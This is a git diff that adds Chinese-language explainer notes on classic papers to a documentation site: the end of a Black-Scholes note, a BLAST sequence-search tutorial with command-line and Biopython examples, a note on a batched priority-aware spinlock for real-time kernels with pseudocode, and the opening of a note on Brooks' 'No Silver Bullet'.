视角:公司资产 V=120,债务面值 D=100,一年后到期,无风险利率 r=5%,资产波动 σ_V=25%: + +```python +# 股权 = Call(V, K=D) +E = black_scholes_call(120, 100, 1.0, 0.05, 0.25) +# 债权价值 ≈ 贴现面值 − 看跌期权(违约损失) +D_pv = 100 * math.exp(-0.05 * 1.0) +P_on_assets = black_scholes_put(120, 100, 1.0, 0.05, 0.25) +debt_value = D_pv - P_on_assets +print(f"股权价值 ≈ {E:.2f}, 债权价值 ≈ {debt_value:.2f}, 合计 ≈ {E + debt_value:.2f}") +``` + +资产 V=120 时,股东「实值」看涨;债权人承担 V 跌破 100 的尾部——**信用风险即卖出看跌**。 + +## 局限与常见误解 + +1. **波动率非常数**:真实市场存在「波动率微笑/偏斜」,Black-Scholes 是基准,不是终局。 +2. **跳跃与厚尾**:1987、2020 等极端日,GBM 假设失效;需 Merton 跳跃扩散、随机波动率(Heston)等。 +3. **连续对冲不可行**:离散再平衡带来 **gamma 风险**;做市商靠买卖价差与库存管理存活。 +4. **μ 消失了,但 σ 成了新上帝**:σ 估错比 μ 估错更致命;实务用隐含波动率反推市场共识。 +5. **American 与股息**:提前行权、分红会改变界条件;闭式公式需修正或数值解。 + +## 与仓库其他笔记的关系 + +- [[kelly-criterion-1956]]:最优下注比例 vs 期权对冲——一个管「赌多少次」,一个管「连续复制」 +- 现代 ML 波动率预测、深度对冲网络,都是在**放松 GBM** 前提下重谈同一问题 + +## 一句话总结 + +Black-Scholes 1973 用**无套利 + 动态对冲**把期权价格写成 S、K、T、r、σ 的函数,并说明公司债与股权不过是同一套期权语言——它把金融从「凭感觉赌方向」变成了「算复制成本」的工程问题。 + +## 延伸阅读 + +- [Princeton 课程 PDF 镜像](https://www.cs.princeton.edu/courses/archive/fall09/cos323/papers/black_scholes73.pdf)(本笔记来源) +- [JSTOR 正式版](https://www.jstor.org/stable/1831029) +- Black & Scholes (1972), *Journal of Finance*:公式实证检验 +- Merton (1973):连续时间推广与美式期权框架 +- Hull, *Options, Futures, and Other Derivatives*:教科书标准表述 diff --git a/src/content/docs/papers/blast-altschul-1990.md b/src/content/docs/papers/blast-altschul-1990.md new file mode 100644 index 000000000..f2f39743d --- /dev/null +++ b/src/content/docs/papers/blast-altschul-1990.md @@ -0,0 +1,297 @@ +--- +title: BLAST — 序列比对的「搜索引擎」 +来源: https://www.sciencedirect.com/science/article/abs/pii/S0022283605803602 +日期: 2026-06-13 +子分类: 生物信息 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你在图书馆里找一本书,但**不知道完整书名**,只记得几句关键台词: + +> 「To be or not to be」 + +如果图书馆有 30 亿本书,你不可能逐本翻开比对。聪明做法是: + +1. **先搜关键词**——把每本书切成固定长度的「词块」,建索引;你的台词也切成同样长度的词块,去索引里找**完全匹配**的片段(seed)。 +2. **再向两边扩展**——找到 seed 后,往前后多读几页,看上下文能不能连成一段像样的相似段落(extension)。 +3. **最后打分排序**——不是「有点像就算」,而是问:**这么像的一段,在随机乱配里出现概率有多低?** 概率越低,越可能是真亲戚。 + +这就是 **BLAST(Basic Local Alignment Search Tool)** 干的事——只不过「书」是 DNA / 蛋白质序列,「台词」是你实验里测到的那条 read,「图书馆」是 GenBank、RefSeq 等数十亿字符的公共数据库。 + +Altschul、Gish、Miller、Myers、Lipman 在 1990 年 *Journal of Molecular Biology* 上发表的这篇论文,把上述直觉变成了**可证明统计性质**的启发式算法,比当时同等灵敏度的工具快一个数量级,成为 1990 年代被引用最多的论文之一。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 标题 | Basic local alignment search tool | +| 作者 | Stephen F. Altschul, Warren Gish, Webb Miller, Eugene W. Myers, David J. Lipman | +| 发表 | *Journal of Molecular Biology*, 215(3):403–410, 1990 | +| DOI | [10.1016/S0022-2836(05)80360-2](https://doi.org/10.1016/S0022-2836(05)80360-2) | +| PubMed | [2231712](https://pubmed.ncbi.nlm.nih.gov/2231712/) | +| 在线工具 | [NCBI BLAST](https://blast.ncbi.nlm.nih.gov/Blast.cgi) | + +论文核心贡献可以概括为三句话: + +1. **局部比对**:找的是两条序列里**最像的一段**(Maximal Segment Pair, MSP),而不是强迫整条序列从头到尾对齐——就像只关心「那几句台词像不像」,不要求两本书页数相同。 +2. **启发式加速**:用短词(word)命中当种子,只扩展有希望的区域,把搜索空间从「每个字符对每个字符」砍到可承受规模。 +3. **统计显著性**:Karlin–Altschul 理论给出高分片段在随机序列里出现的期望次数 **E-value**,让「像不像」变成「信不信得过」。 + +## 为什么重要 + +不理解 BLAST,下面这些事都没法解释: + +- 为什么测完一条 DNA,第一反应是「拿去 NCBI BLAST 一下」——它是分子生物学界的**默认搜索引擎** +- 为什么论文里写 `E-value < 1e-50` 而不是「相似度 87%」——百分比不随数据库变大而调整,E-value 会 +- 为什么 [[smith-waterman]] 精确但慢、BLAST 快但启发式——工程上几乎总是先用 BLAST 筛候选,再用慢方法精修 +- 为什么宏基因组、注释基因、查同源蛋白、验证引物特异性,背后都是同一套「种子 + 扩展 + 统计」骨架 + +从 1990 到今,BLAST 家族演化出 blastn / blastp / blastx / tblastn / PSI-BLAST / megablast 等变体,但**论文里的 MSP 定义和 E-value 框架**仍是理解一切的起点。 + +## 核心概念 + +### 1. 序列与字母表 + +- **DNA**:字母表 `{A, C, G, T}`(有时含 `N` 表示未知) +- **蛋白质**:20 种标准氨基酸 + 终止符 `*` + +序列就是字母串。两条序列「相关」意味着存在**局部**片段,在进化或功能上同源。 + +### 2. 打分矩阵(Scoring Matrix) + +比对不是数「几个字母相同」,而是查表: + +| 事件 | 典型处理 | +|------|----------| +| 匹配(如 Leu–Leu) | +4 ~ +6(BLOSUM62) | +| 错配 | 负数惩罚 | +| 开 gap | 额外惩罚 + 每延长一格再罚 | + +常用矩阵:**BLOSUM62**(蛋白质)、**PAM** 系列、核酸的匹配/错配分(blastn 默认 +2/-3 等)。 + +### 3. Word(词)与种子(Seed) + +BLAST 从查询序列抽出长度为 `w` 的连续子串列表(blastp 默认 `w=3`,blastn 默认 `w=11` 或 megablast 的 `w=28`)。 + +数据库里**完全匹配**(或超过阈值 `T` 的近似匹配)的 word 叫 **hit / seed**。只有 seed 才触发后续昂贵的扩展。 + +直觉:**word 越大 → 种子越少 → 越快但越容易漏远缘同源**。 + +### 4. High-Scoring Segment Pair(HSP) + +从 seed 向左右**无 gap 延伸**,累加打分;分数开始下降超过阈值 `X` 就停。得到的**最高分局部无 gap 段**是一个 HSP。 + +多个 HSP 可属于同一条数据库序列;gapped BLAST 还会在高分 HSP 上再做带 gap 的精修(类似局部 Smith–Waterman)。 + +### 5. Two-hit 方法(1997 扩展,理解现代 BLAST 必备) + +原始「one-hit」:任何一个 seed 都尝试扩展——**超过 90% 时间耗在这里**。 + +**Two-hit**:同一条对角线上,两个相距不超过距离 `A` 的 seed 都命中,才触发扩展。随机噪声里凑齐「两个近邻 seed」的概率低得多,扩展次数大约减半,速度显著提升。 + +### 6. E-value 与 Bit Score + +Karlin–Altschul 公式(查询长 `m`,数据库有效长 `n`,原始分 `S`): + +``` +E = K · m · n · e^(-λS) +``` + +- **E**:随机背景下,得分 ≥ S 的 HSP 期望出现次数 +- **K, λ**:由打分矩阵决定的常数(BLOSUM62 约 λ≈0.267, K≈0.041) +- **E 越小越显著**;常用阈值 `E < 0.01` 或 `1e-5` +- **Bit score** `S' = (λS - ln K) / ln 2`:与数据库大小无关,便于跨搜索比较 + +当 `E < 0.01` 时,E-value 与 P-value(至少出现一次的概率)近似:`P ≈ 1 - e^(-E) ≈ E`。 + +### 7. BLAST 程序族(零基础先记这五个) + +| 程序 | 查询 | 数据库 | 典型用途 | +|------|------|--------|----------| +| **blastn** | 核酸 | 核酸 | 基因定位、引物特异性 | +| **megablast** | 核酸 | 核酸 | 近同源、大片段,word 更大更快 | +| **blastp** | 蛋白 | 蛋白 | 找同源蛋白、功能注释 | +| **blastx** | 核酸(6 框翻译) | 蛋白 | 新基因可能编码什么蛋白 | +| **tblastn** | 蛋白 | 核酸(6 框翻译) | 蛋白在哪些基因组里出现 | + +## 算法流程(一图胜千言) + +```text +查询序列 Q + │ + ▼ +生成 word 列表(长度 w) + │ + ▼ +在数据库索引中找 word hit ──► 无 hit → 丢弃 + │ + ▼ +Two-hit 过滤(可选)──► 未凑齐双 seed → 丢弃 + │ + ▼ +无 gap 延伸 → 得到 HSP 原始分 S + │ + ▼ +S ≥ 阈值?──否──► 丢弃 + │ + ▼ +(可选)Gapped 精修 + │ + ▼ +计算 bit score、E-value → 排序输出 +``` + +## 实践案例 + +### 案例 1:命令行 blastn——把一条基因扔进水母基因组 + +假设你有一条来自模式生物的基因序列 `gene.fa`,想查它在 *Hydra* 基因组里有没有同源拷贝: + +```bash +# 需本地安装 NCBI BLAST+(brew install blast 或 conda install blast) +makeblastdb -in hydra_genome.fa -dbtype nucl -out hydra_db + +blastn \ + -query gene.fa \ + -db hydra_db \ + -outfmt "6 qseqid sseqid pident length evalue bitscore" \ + -evalue 1e-5 \ + -word_size 11 \ + -max_target_seqs 10 +``` + +`-outfmt 6` 输出制表符分隔字段,便于管道进 `awk` / R / Python。关注列: + +- **pident**:相同碱基百分比(启发式延伸结果,不是全局定义) +- **evalue**:统计显著性——比 pident 更该用来决定「算不算同源」 +- **bitscore**:与数据库大小无关的强弱分 + +若近缘物种、序列很长且几乎相同,可换 **megablast**(`-task megablast`,默认 `word_size=28`)换速度。 + +### 案例 2:Python 调 NCBI 远程 BLAST(不写本地数据库) + +适合快速验证、序列不长、能接受排队: + +```python +from Bio.Blast import NCBIWWW, NCBIXML +from io import StringIO + +query = ( + "ATGAAAGAATTGAAAGAAGAAGGTGAAGAAGATGATGATGAA" + "GAAGGTGAAGAAGAAGAAGAAGAAGAAGAAGAAGAAGAAGAA" +) + +result_handle = NCBIWWW.qblast( + program="blastn", + database="nt", # 核酸非冗余库,实际很大 + sequence=query, + expect=0.001, + word_size=11, +) + +blast_record = NCBIXML.read(result_handle) + +for alignment in blast_record.alignments[:5]: + hsp = alignment.hsps[0] + print(alignment.title[:60]) + print(f" E-value={hsp.expect:.2e} bit_score={hsp.bits:.1f} identity={hsp.identities}/{hsp.align_length}") +``` + +`Bio.Blast` 来自 [Biopython](https://biopython.org/)。远程 BLAST 有频率限制;生产管线应下载数据库 + 本地 `blastn`。 + +### 案例 3:手算 E-value——理解「数据库越大,同样分数越不可信」 + +下面用 BLOSUM62 的典型 λ、K 做**数量级直觉**(非替代 BLAST 内置统计): + +```python +import math + +def e_value(raw_score: float, m: int, n: int, K: float = 0.041, lam: float = 0.267) -> float: + """期望随机命中次数。m=查询长,n=数据库有效搜索空间长度。""" + return K * m * n * math.exp(-lam * raw_score) + +def bit_score(raw_score: float, K: float = 0.041, lam: float = 0.267) -> float: + return (lam * raw_score - math.log(K)) / math.log(2) + +S = 85 # 假设某次 HSP 原始分 +m, n = 400, 3e9 # 400 bp 查询,30 亿字母数据库 + +print(f"E = {e_value(S, m, n):.2e}") # 很小 → 显著 +print(f"bit = {bit_score(S):.1f}") + +# 数据库扩大 1000 倍,同样 S,E 也扩大 1000 倍 +print(f"E (n×1000) = {e_value(S, m, n * 1000):.2e}") +``` + +这就是为什么同一条比对,在小数据库里 `E=1e-10`,换全库 nt 可能变成 `E=0.1`——**不是序列变了,是「抽奖次数」变多了**。Bit score 不变,因为它吃掉了 `m、n` 的影响。 + +### 案例 4:word_size 与敏感度的权衡 + +```bash +# 远缘同源、短序列:较小 word,更慢更敏感 +blastn -query short_read.fa -db nr_db -word_size 7 -evalue 1e-3 + +# 近缘、查基因是否在该物种基因组:大 word,快 +blastn -query gene.fa -db target_genome -task megablast -word_size 28 +``` + +经验法则:**word_size 必须小于查询长度的一半**,否则合法 hit 可能被漏掉。 + +## 踩过的坑 + +1. **只看 % identity 不看 E-value**——短序列上 95% identity 仍可能 E 很大(随机也能凑出来);长序列上 70% identity 可以极显著。 + +2. **把 E-value 当概率**——E 是**期望次数**;P(至少一次) = 1 - e^(-E)。E=10 不代表「10% 概率」,而是「随机期望出现 10 次」。 + +3. **不同数据库结果不可直接比 E-value**——跨库请比 **bit score**;同一 bit score,库越大 E 越大。 + +4. **局部比对 ≠ 全序列同源**——一个蛋白结构域能撞出高分 HSP,整条基因未必同源;要读比对示意图,别只扫表格。 + +5. **低复杂度 / 重复序列**——poly-A、转座子 repeat 会产生大量假阳性;可用 `dust`(核酸)或 `seg`(蛋白)过滤,或调 `-soft_masking`。 + +6. **blastx / tblastn 的阅读框**——核酸翻译有 6 个阅读框,计算量比 blastp 大;查询太短则统计无力。 + +7. **远程 BLAST 与本地版本参数默认值可能不同**——复现论文结果时记录 `blastn -version` 和完整参数。 + +## 适用 vs 不适用 + +**适用**: + +- 在公共库中找同源基因 / 蛋白(注释、进化分析) +- 验证测序 read 污染、引物非特异扩增 +- 快速筛选候选,再交给 [[smith-waterman]]、HMMER、AlphaFold 等做精细分析 +- 教学演示:序列相似性 + 假设检验直觉 + +**不适用**: + +- 需要**全局**最优比对且序列很长——用 Needleman–Wunsch 全局比对或 minimap2 等 +- 结构比对、RNA 二级结构——用专门工具(Foldseek、Infernal) +- 超远缘、低于 twilight zone(~20–30% aa identity)——PSI-BLAST、HHblits、Jackhmmer 迭代搜库 +- 实时超长读长映射(PacBio/ONT)——minimap2、Winnowmap 等索引结构完全不同 + +## 与相关工作的关系 + +```text +动态规划精确比对 启发式数据库搜索 +───────────────────────────────────────────── +Needleman–Wunsch (全局) BLAST (局部, 1990) ← 本篇 +Smith–Waterman (局部) FASTA (1988, 不同种子策略) + PSI-BLAST (1997, 迭代 profile) + DIAMOND (蛋白, 比 BLAST 更快数量级) +``` + +BLAST 不是「发明了序列比对」——Smith–Waterman (1981) 等早已给出最优局部比对动态规划。BLAST 的贡献是:**在几乎不牺牲实用灵敏度的前提下,把数据库搜索做成生物学家每天能点一下网页就用的速度**,并配上严格可解释的 E-value。 + +## 延伸阅读 + +- [NCBI BLAST 教程:相似性分数统计](https://www.ncbi.nlm.nih.gov/blast/tutorial/Altschul-1.html) +- [Nature Scitable:BLAST 入门](https://www.nature.com/scitable/topicpage/basic-local-alignment-search-tool-blast-29096/) +- Altschul S.F. et al. (1997) Gapped BLAST and PSI-BLAST — 引入 two-hit 与迭代搜索 +- Karlin S., Altschul S.F. (1990) Methods for assessing the statistical significance of molecular sequence features — E-value 理论根基 + +## 一句话总结 + +**BLAST 把「在几十亿字母里找亲戚」变成:先用短词命中当地震预警,再延伸成高分片段,最后用 E-value 告诉你——这到底是进化上的亲戚,还是随机撞衫。** diff --git a/src/content/docs/papers/bounded-priority-aware-locking-for-real-time-kernels-arxiv-2605-27620.md b/src/content/docs/papers/bounded-priority-aware-locking-for-real-time-kernels-arxiv-2605-27620.md new file mode 100644 index 000000000..ad7a9d6d1 --- /dev/null +++ b/src/content/docs/papers/bounded-priority-aware-locking-for-real-time-kernels-arxiv-2605-27620.md @@ -0,0 +1,263 @@ +--- +title: Bounded Priority-Aware Locking for Real-Time Kernels +来源: https://arxiv.org/abs/2605.27620 +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +# Bounded Priority-Aware Locking for Real-Time Kernels + +## 一、一个日常类比 + +想象你走进一个只有一扇门的会议室。门上有规则:一次只能进一个人,进去的人关上门开完会才能出来。这就是"锁"。 + +现在假设进来的人分三种:急症病人(高优先级)、普通病人(中优先级)、体检的人(低优先级)。 + +如果规则是"先到先进"(FIFO),那么一个低优先级的人抢在高优先级病人前面进门,高优先级病人就要多等一轮——这就是"优先级反转"。 + +如果规则是"谁急谁先"(Strict Priority),那所有低优先级的人都永远进不去——这就是"饥饿"。 + +BPL 方案说:我们把来的人分批次。同一批进来的人里,按紧急程度排;但先到的批次,比后到的批次优先。这样既照顾了紧急程度,又不会让谁饿死。 + +## 二、核心问题:实时系统中的锁 + +### 2.1 什么是实时系统 + +实时系统不是"越快越好",而是"必须在截止时间前完成"。比如飞行控制、汽车刹车——错过了截止时间,后果严重。 + +### 2.2 多核时代的共享资源问题 + +现代实时系统通常有多个 CPU 核心。多个核心上的程序可能同时需要访问同一个共享资源(比如操作系统的内核数据)。为了保证安全,需要用锁来序列化访问。 + +关键挑战有两个: + +1. **等待时间必须有上限**。系统需要知道"最坏情况下我等多久",才能证明所有任务都能在截止时间前完成。 +2. **高优先级任务不应该被低优先级任务无谓地拖慢**。 + +### 2.3 三种锁的对比 + +| 锁类型 | 高优先级任务等待 | 低优先级任务等待 | 等待时间有上限? | +|---|---|---|---| +| 简单自旋锁 | 不确定,可能很长 | 不确定,可能很短 | 理论上有,但不考虑优先级 | +| FIFO 锁 | 和所有人一样 | 和所有人一样 | 有(m-1 轮临界区长度) | +| 严格优先级锁 | 最短 | 可能被饿死 | 没有(可能无限等) | +| **BPL** | 比普通 FIFO 短 | 有保证不会饿死 | 有(和 FIFO 一样的上限) | + +## 三、BPL 的核心设计 + +BPL(Batched Priority Lock)分四个阶段让等待中的任务竞争锁: + +**阶段 0(批处理)**:每个新来的任务获得一个批次号。最早到达的那个批次(批次号最小的)晋级到下一阶段。 + +**阶段 1(优先级排序)**:同一批次内,所有任务竞争,找出优先级最高的那个。 + +**最终阶段(自旋)**:批次号和优先级都确定后,任务用传统自旋锁竞争实际访问。 + +### 3.1 BPL 锁对象的内部状态 + +一个 BPL 锁维护以下几个关键状态: + +- `num_waiters`:当前在等待的任务数量 +- `curr_batch`:一个复合值,高几位是批次号,低几位是当前批次中有多少等待者 +- `batch_barrier`:阶段 0 的"门控值",记录最早到达的批次号 +- `priority_barrier`:阶段 1 的"门控值",记录当前批次中最高的优先级 +- `settling`:一个位图数组,标记每个核心上的任务在哪个阶段 +- `status`:锁是否被持有的标志 + +### 3.2 代码示例 1:加锁流程 + +下面用伪代码展示 BPL 的核心加锁逻辑。这个实现依赖于硬件提供的原子操作:CAS(比较并交换)、TAS(测试并设置)、FAA(获取并增加)。 + +```c +// BPL 锁对象的内存布局 +struct bpl { + uint32_t num_waiters; // 当前等待者数量 + uint32_t curr_batch; // 批次号 + 批次内计数(合并在一个整数中) + uint32_t batch_barrier; // 阶段 0 门控:最早批次号 + uint32_t priority_barrier;// 阶段 1 门控:最高优先级 + uint64_t settling[2]; // 位图:标记各核心在哪个阶段 + uint8_t status; // 0 = 空闲, 1 = 被持有 +}; + +// 加锁函数 +void bpl_lock(struct bpl *lock, uint32_t task_priority, int core_id) { + // ---- 快速路径:没人等的时候直接拿到锁 ---- + if (lock->num_waiters == 0) { + // 尝试把 curr_batch 清零,说明锁完全空闲了 + if (CAS(&lock->curr_batch, old, 0)) { + // 用 TAS 尝试获取锁,成功就直接进入临界区 + if (!TAS(&lock->status)) { + return; // 拿到了! + } + } + } + + // ---- 有人竞争:进入正式流程 ---- + + // 1. 增加等待者计数 + INC(&lock->num_waiters); + + // 2. 获取批次号:FAA 原子地增加 curr_batch 并返回旧值 + // 右移 k 位得到批次号(低 k 位是批次内计数) + uint32_t batch = FAA(&lock->curr_batch, 1) >> k; + + // 3. 阶段 0:批处理 —— 只有最早到达的批次能通过 + SET(&lock->settling[0], core_id); // 标记自己在阶段 0 + + read_batch_barrier: + uint32_t prev = lock->batch_barrier; + if (batch <= prev) { + // 自己的批次号 <= 当前门控批次号,尝试成为新的门控 + if (CAS(&lock->batch_barrier, prev, batch)) { + RESET(&lock->settling[0], core_id); // 晋级,清除标记 + goto stage_1; + } + } else { + // 有人批次号更早,等等再试 + goto read_batch_barrier; + } + + // 如果 batch > batch_barrier,说明自己不是最早的一批, + // 等当前批次的人都到齐后再试 + RESET(&lock->settling[0], core_id); + while (lock->settling[0] != 0) { + if (lock->batch_barrier != batch) { + goto read_batch_barrier; // 批次变了,重新排队 + } + } + + // 4. 阶段 1:优先级排序 —— 同一批次里,最高优先级的通过 + stage_1: + SET(&lock->settling[1], core_id); // 标记自己在阶段 1 + + read_priority_barrier: + prev = lock->priority_barrier; + if (lock->batch_barrier != batch) { + // 批次号变了,重新排队 + STORE(&lock->priority_barrier, 0xFFFFFFFF); + RESET(&lock->settling[1], core_id); + goto stage_0; + } + + // 数值越小 = 优先级越高,所以尝试把自己的优先级"压低" + if (task_priority <= prev) { + if (CAS(&lock->priority_barrier, prev, task_priority)) { + RESET(&lock->settling[1], core_id); // 晋级,清除标记 + goto final_stage; + } + } else { + goto read_priority_barrier; + } + + RESET(&lock->settling[1], core_id); + while (lock->settling[1] != 0) { + if (lock->priority_barrier != task_priority) { + // 批次号变了或优先级变了,重排 + goto stage_1; + } + } + + // 5. 最终阶段:真正的自旋锁竞争 + final_stage: + if (lock->priority_barrier != task_priority) { + goto stage_1; // 批次变了,回到优先级排序 + } + if (lock->batch_barrier != batch) { + STORE(&lock->priority_barrier, 0xFFFFFFFF); + goto stage_0; // 批次变了,回到批处理阶段 + } + + // 尝试获取锁 + if (!TAS(&lock->status)) { + return; // 拿到了! + } else { + goto final_stage; // 没拿到,继续自旋 + } + + // 拿到锁后,进入临界区... + // --- 临界区 --- + // ... + + // 解锁时重置批次计数,开始新的一批 + unlock(lock); +} +``` + +### 3.3 代码示例 2:解锁流程 + +解锁看起来很简单,但有一个关键操作:重置批次计数。 + +```c +// 解锁函数 +void bpl_unlock(struct bpl *lock) { + // 清除 curr_batch 低 k 位(批次内计数归零) + // 然后高 k 位加 1(新的批次号) + uint32_t new_val = lock->curr_batch; + new_val = new_val & ~((1 << k) - 1); // 清零低 k 位 + new_val = new_val + (1 << k); // 批次号 +1 + + STORE(&lock->curr_batch, new_val); + + // 释放锁 + RESET(&lock->status, 0); +} +``` + +每次解锁都产生一个新批次号,等待中的任务全部被"打回"阶段 0 重新排队。这样确保了:先到的批次优先获得服务,同一批次内优先级高的优先获得服务。 + +### 3.4 工作流程图解 + +用一个 3 核心的例子来看 BPL 是如何工作的: + +``` +时刻 t=1: 任务 τb (中优先级) 持有锁,在 Core 1 上运行 + +时刻 t=2: 任务 τc (低优先级) 在 Core 2 上请求锁 -> 进入阶段0,批次0 + 任务 τa (高优先级) 在 Core 0 上请求锁 -> 进入阶段0,批次0 + +时刻 t=3: τb 释放锁 -> curr_batch 批次号+1,status 清零 + τa 发现自己是批次0中优先级最高的 -> 晋级到最终阶段 -> 拿到锁 + τc 因为批次0的锁已被 τa 拿走 -> 回退到阶段1,等下一轮 + +结果:高优先级的 τa 只等了一个临界区的长度,而不是像 FIFO 那样 + 必须等 τc 也完成才能轮到。但 τc 不会被饿死,因为它和 τa 同批。 +``` + +## 四、为什么 BPL 比现有方案好 + +### 4.1 释放优先级锁(Release-prioritized) + +这种方案用 FIFO 排队,但释放锁时,持有锁的任务要遍历整个等待队列找最高优先级的。问题:**这延长了临界区的实际执行时间**,因为释放操作本身变慢了。 + +### 4.2 获取优先级锁(Acquire-prioritized) + +这种方案用优先级队列,任务在申请锁时就按优先级排好。问题:**插入优先级队列的操作本身可能有不可预测的延迟**,在最坏情况下可能导致无限等待。 + +### 4.3 BPL 的折中 + +BPL 的关键洞察是:**不需要在加锁或释放的单个步骤中完成全局优先级排序**。相反,它把排序分散到多个阶段,每个阶段的局部竞争都是常数级开销。结果是: + +- 快速路径下,无竞争时性能等同简单自旋锁 +- 有竞争时,高优先级任务的平均等待时间比 FIFO 短 +- 所有任务的等待时间都有上限,上限值与 FIFO 锁相同 + +## 五、关键术语表 + +- **自旋锁(Spinlock)**:等待锁时不停循环检查,不释放 CPU,适合短时间等待 +- **临界区(Critical Section)**:需要互斥访问的代码段 +- **优先级反转(Priority Inversion)**:高优先级任务被低优先级任务间接阻塞 +- **FIFO 锁**:先到先服务的锁,保证等待时间有上限但不区分优先级 +- **饥饿(Starvation)**:某个任务永远等不到锁 +- **CAS**:Compare-and-Swap,一种原子硬件指令 +- **TAS**:Test-and-Set,另一种原子硬件指令 +- **FAA**:Fetch-and-Add,原子地读取并增加一个值 + +## 六、思考 + +BPL 的设计哲学是"分批处理"而非"全局排序"。这类似于生活中的取号排队:你在银行取了一个号(批次号),窗口叫号时,同一批次内先看谁的紧急程度更高。你不需要知道所有人的情况,只需要和本批次的人竞争。 + +这种设计在 m 核系统中(m 通常较小,比如 8-64 核),既能保证可预测的 worst-case 等待时间,又能让高优先级任务获得更好的平均性能。 + +**一个值得思考的问题**:如果核数非常大(比如 1000+ 核),BPL 的 k 位拆分策略还会高效吗?因为 k = ceil(log2(m)),核数越多,用于批次数值的比特位就越少,能容纳的批次就越有限。这是一个可以进一步研究的方向。 diff --git a/src/content/docs/papers/brakerski-bgv-2012.md b/src/content/docs/papers/brakerski-bgv-2012.md index 7595685fa..2f288bbe4 100644 --- a/src/content/docs/papers/brakerski-bgv-2012.md +++ b/src/content/docs/papers/brakerski-bgv-2012.md @@ -165,6 +165,7 @@ ct' = round(q'/q · ct) mod q' - [[cheon-ckks-2017]] —— Homomorphic Encryption for Arithmetic of Approximate Numbers - [[chillotti-tfhe-2016]] —— Faster Fully Homomorphic Encryption: Bootstrapping in Less Than 0.1 Seconds +- [[ckks-homomorphic-2017]] —— CKKS 同态加密 — 在加密数据上做近似浮点运算 - [[fan-vercauteren-bfv-2012]] —— Somewhat Practical Fully Homomorphic Encryption - [[gentry-fhe-2009]] —— Gentry FHE — 全同态加密开山 - [[regev-lwe-2005]] —— On Lattices, Learning with Errors, Random Linear Codes, and Cryptography diff --git a/src/content/docs/papers/branch-prediction-yeh-patt-1991.md b/src/content/docs/papers/branch-prediction-yeh-patt-1991.md index ade69d0b9..874c315ac 100644 --- a/src/content/docs/papers/branch-prediction-yeh-patt-1991.md +++ b/src/content/docs/papers/branch-prediction-yeh-patt-1991.md @@ -156,6 +156,7 @@ if (x == 0) log_zero(); - [[kocher-spectre-2019]] —— Spectre 攻击 — 推测执行偷看别人的内存 - [[mcfarling-bp-1993]] —— McFarling 1993 — 用 XOR 把全局历史和 PC 拧在一起,再让两个预测器打擂台 - [[self-pic]] —— Self / PIC — 内联缓存的诞生 +- [[spectre-attack-2018]] —— Spectre Attacks — 推测执行如何绕过边界检查偷读内存 - [[ssa]] —— SSA — 静态单赋值形式 - [[tracemonkey]] —— TraceMonkey — 只编"真的走过的那一条路" diff --git a/src/content/docs/papers/brooks-no-silver-bullet-1986.md b/src/content/docs/papers/brooks-no-silver-bullet-1986.md new file mode 100644 index 000000000..bacad90e7 --- /dev/null +++ b/src/content/docs/papers/brooks-no-silver-bullet-1986.md @@ -0,0 +1,225 @@ +--- +title: No Silver Bullet — Essence and Accident in Software Engineering(Brooks, 1986) +来源: http://worrydream.com/refs/Brooks-NoSilverBullet.pdf +日期: 2026-06-13 +分类: 其他 +子分类: 工程文化 +provenance: pipeline-v3 +--- + +## 是什么 + +Frederick P. Brooks, Jr. 在 1986 年 IEEE Computer 上发表的这篇短文,是软件工程领域被引用最多的文章之一。Brooks 此前在《人月神话》(1975)里提出「没有银弹」的怀疑;十年后他系统论证:**未来十年内,不存在任何一种单独的技术或管理手段,能单独把软件的生产率、可靠性或简洁性提高一个数量级(10 倍)**。 + +文章借用亚里士多德哲学里的两个词: + +- **Essence(本质)**:软件**固有**的困难——概念结构本身复杂、必须符合外部世界、需求总在变、又难以可视化。 +- **Accident(偶然)**:**当前生产条件**带来的困难——机器慢、语言难写、调试环境差、文档工具落后等;它们不是软件「是什么」的一部分,而是「我们怎么造它」的副产品。 + +日常类比:你要开一家连锁奶茶店。 + +- **本质工作**:想清楚菜单逻辑、会员积分规则、供应链与门店扩张策略、高峰期排队模型——这些**业务概念**无论最后用 Excel、Java 还是 AI 写代码,都必须有人想清楚。 +- **偶然工作**:店员手写订单、算盘结账、没有冰箱——换成 POS 机、扫码支付、冷链物流,效率会暴涨;但若「买一杯送一杯且不能与优惠券叠加」这条规则本身就没定义清楚,再快的收银台也救不了。 + +Brooks 的论点可以压缩成一句:**过去几十年的大进步,多半是在削偶然难度;而银弹幻想,往往把偶然难度的胜利误当成能消灭本质难度。** + +## 为什么重要 + +1986 年的人们热议:Ada、面向对象、AI、专家系统、形式化验证会不会终结软件危机?Brooks 的回答冷静而持久: + +1. **设定期望**:管理层不能指望「换一门语言 / 上一个框架」就 10 倍提效;团队也不会因为没达到而自我怀疑到失真。 +2. **区分投资方向**:编译器、IDE、云原生工具值得做,但它们是**边际改进**;真正难的是需求、架构、概念建模与优秀设计师的培养。 +3. **解释历史**:高级语言带来约 5 倍生产力,时间共享、Unix 统一环境也有显著收益——但这些都是**偶然**层面的解放,无法无限外推。 +4. **指导今天**:大模型辅助编程、低代码、Copilot 很像新一代「高级语言 + 时间共享」——极大减少打字与样板代码,却**不会自动**替你弄清「退款时积分要不要扣回」这种本质问题。 + +读不懂 essence/accident,就容易在每次技术浪潮里重复同一句话:「这次不一样了。」Brooks 的文章就是提醒你先问:**这次到底在打本质,还是在打偶然?** + +## 核心概念 + +### 1. 银弹(Silver Bullet) + +民间传说里,只有银弹能一击杀死狼人。Brooks 把「狼人」比作软件危机:进度失控、成本超支、质量不可靠。银弹 = **单一**突破,能单独带来**数量级**改善。 + +他承认硬件有过银弹式飞跃:电子管 → 晶体管 → 大规模集成电路,性能与成本曲线像摩尔定律那样指数变化。但软件没有对称的「物理定律」帮你自动变便宜。 + +### 2. 软件的本质是什么 + +软件实体是**互锁的概念构造**: + +- 数据集与数据项之间的关系 +- 算法 +- 对函数的调用关系 + +这些概念是**抽象的**(同一份设计可以用不同语言实现),却又**极其精细**(不是模糊的诗意,而是能执行的具体结构)。造软件,首要任务是**在头脑中锻造这些概念**,其次才是把它们写进语言、编译、部署。 + +### 3. 本质的四大属性 + +| 属性 | 含义 | 日常类比 | +|------|------|----------| +| **复杂性(Complexity)** | 同规模下,软件比建筑、汽车更复杂,因为几乎没有完全相同的「零件」;重复出现就会被抽象成子程序 